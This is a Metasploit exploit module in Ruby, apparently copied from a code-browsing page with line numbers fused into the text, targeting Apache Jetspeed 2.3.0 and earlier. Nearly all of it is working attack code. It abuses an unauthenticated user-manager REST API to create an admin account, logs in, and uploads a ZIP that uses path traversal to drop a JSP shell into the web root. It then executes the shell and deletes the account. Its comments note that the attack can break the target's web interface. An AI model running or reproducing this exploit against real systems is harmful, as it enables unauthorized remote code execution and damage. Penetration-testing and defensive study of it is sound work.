Path: blob/master/modules/exploits/multi/http/apache_jetspeed_file_upload.rb
19812 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote6Rank = ManualRanking78include Msf::Exploit::Remote::HttpClient9include Msf::Exploit::FileDropper1011def initialize(info = {})12super(13update_info(14info,15'Name' => 'Apache Jetspeed Arbitrary File Upload',16'Description' => %q{17This module exploits the unsecured User Manager REST API and a ZIP file18path traversal in Apache Jetspeed-2, version 2.3.0 and unknown earlier19versions, to upload and execute a shell.2021Note: this exploit will create, use, and then delete a new admin user.2223Warning: in testing, exploiting the file upload clobbered the web24interface beyond repair. No workaround has been found yet. Use this25module at your own risk. No check will be implemented.26},27'Author' => [28'Andreas Lindh', # Vulnerability discovery29'wvu' # Metasploit module30],31'References' => [32['CVE', '2016-0710'],33['CVE', '2016-0709'],34['URL', 'http://haxx.ml/post/140552592371/remote-code-execution-in-apache-jetspeed-230-and'],35['URL', 'https://portals.apache.org/jetspeed-2/security-reports.html#CVE-2016-0709'],36['URL', 'https://portals.apache.org/jetspeed-2/security-reports.html#CVE-2016-0710']37],38'DisclosureDate' => '2016-03-06',39'License' => MSF_LICENSE,40'Platform' => ['linux', 'win'],41'Arch' => ARCH_JAVA,42'Privileged' => false,43'Targets' => [44['Apache Jetspeed <= 2.3.0 (Linux)', 'Platform' => 'linux'],45['Apache Jetspeed <= 2.3.0 (Windows)', 'Platform' => 'win']46],47'DefaultTarget' => 0,48'Notes' => {49'Reliability' => UNKNOWN_RELIABILITY,50'Stability' => UNKNOWN_STABILITY,51'SideEffects' => UNKNOWN_SIDE_EFFECTS52}53)54)5556register_options([57Opt::RPORT(8080)58])59end6061def print_status(msg = '')62super("#{peer} - #{msg}")63end6465def print_warning(msg = '')66super("#{peer} - #{msg}")67end6869def exploit70print_status("Creating admin user: #{username}:#{password}")71create_admin_user72print_status('Logging in as newly created admin')73jetspeed_login74print_status("Uploading payload ZIP: #{zip_filename}")75upload_payload_zip76print_status("Executing JSP shell: /jetspeed/#{jsp_filename}")77exec_jsp_shell78end7980def cleanup81print_status("Deleting user: #{username}")82delete_user83super84end8586#87# Exploit methods88#8990def create_admin_user91send_request_cgi(92'method' => 'POST',93'uri' => '/jetspeed/services/usermanager/users',94'vars_post' => {95'name' => username,96'password' => password,97'password_confirm' => password98}99)100send_request_cgi(101'method' => 'POST',102'uri' => "/jetspeed/services/usermanager/users/#{username}",103'vars_post' => {104'user_enabled' => 'true',105'roles' => 'admin'106}107)108end109110def jetspeed_login111res = send_request_cgi(112'method' => 'GET',113'uri' => '/jetspeed/login/redirector'114)115116res = send_request_cgi!(117'method' => 'POST',118'uri' => '/jetspeed/login/j_security_check',119'cookie' => res.get_cookies,120'vars_post' => {121'j_username' => username,122'j_password' => password123}124)125126@cookie = res.get_cookies127end128129# Let's pretend we're mechanize130def import_file131res = send_request_cgi(132'method' => 'GET',133'uri' => '/jetspeed/portal/Administrative/site.psml',134'cookie' => @cookie135)136137html = res.get_html_document138import_export = html.at('//a[*//text() = "Import/Export"]/@href')139140res = send_request_cgi!(141'method' => 'POST',142'uri' => import_export,143'cookie' => @cookie144)145146html = res.get_html_document147html.at('//form[*//text() = "Import File"]/@action')148end149150def upload_payload_zip151zip = Rex::Zip::Archive.new152zip.add_file("../../webapps/jetspeed/#{jsp_filename}", payload.encoded)153154mime = Rex::MIME::Message.new155mime.add_part(zip.pack, 'application/zip', 'binary',156%Q{form-data; name="fileInput"; filename="#{zip_filename}"})157mime.add_part('on', nil, nil, 'form-data; name="copyIdsOnImport"')158mime.add_part('Import', nil, nil, 'form-data; name="uploadFile"')159160case target['Platform']161when 'linux'162register_file_for_cleanup("../webapps/jetspeed/#{jsp_filename}")163register_dir_for_cleanup("../temp/#{username}")164when 'win'165register_file_for_cleanup("..\\webapps\\jetspeed\\#{jsp_filename}")166register_dir_for_cleanup("..\\temp\\#{username}")167end168169send_request_cgi(170'method' => 'POST',171'uri' => import_file,172'ctype' => "multipart/form-data; boundary=#{mime.bound}",173'cookie' => @cookie,174'data' => mime.to_s175)176end177178def exec_jsp_shell179send_request_cgi(180'method' => 'GET',181'uri' => "/jetspeed/#{jsp_filename}",182'cookie' => @cookie183)184end185186#187# Cleanup methods188#189190def delete_user191send_request_cgi(192'method' => 'DELETE',193'uri' => "/jetspeed/services/usermanager/users/#{username}"194)195end196197#198# Utility methods199#200201def username202@username ||= Rex::Text.rand_text_alpha_lower(8)203end204205def password206@password ||= Rex::Text.rand_text_alphanumeric(8)207end208209def jsp_filename210@jsp_filename ||= Rex::Text.rand_text_alpha(8) + '.jsp'211end212213def zip_filename214@zip_filename ||= Rex::Text.rand_text_alpha(8) + '.zip'215end216end217218219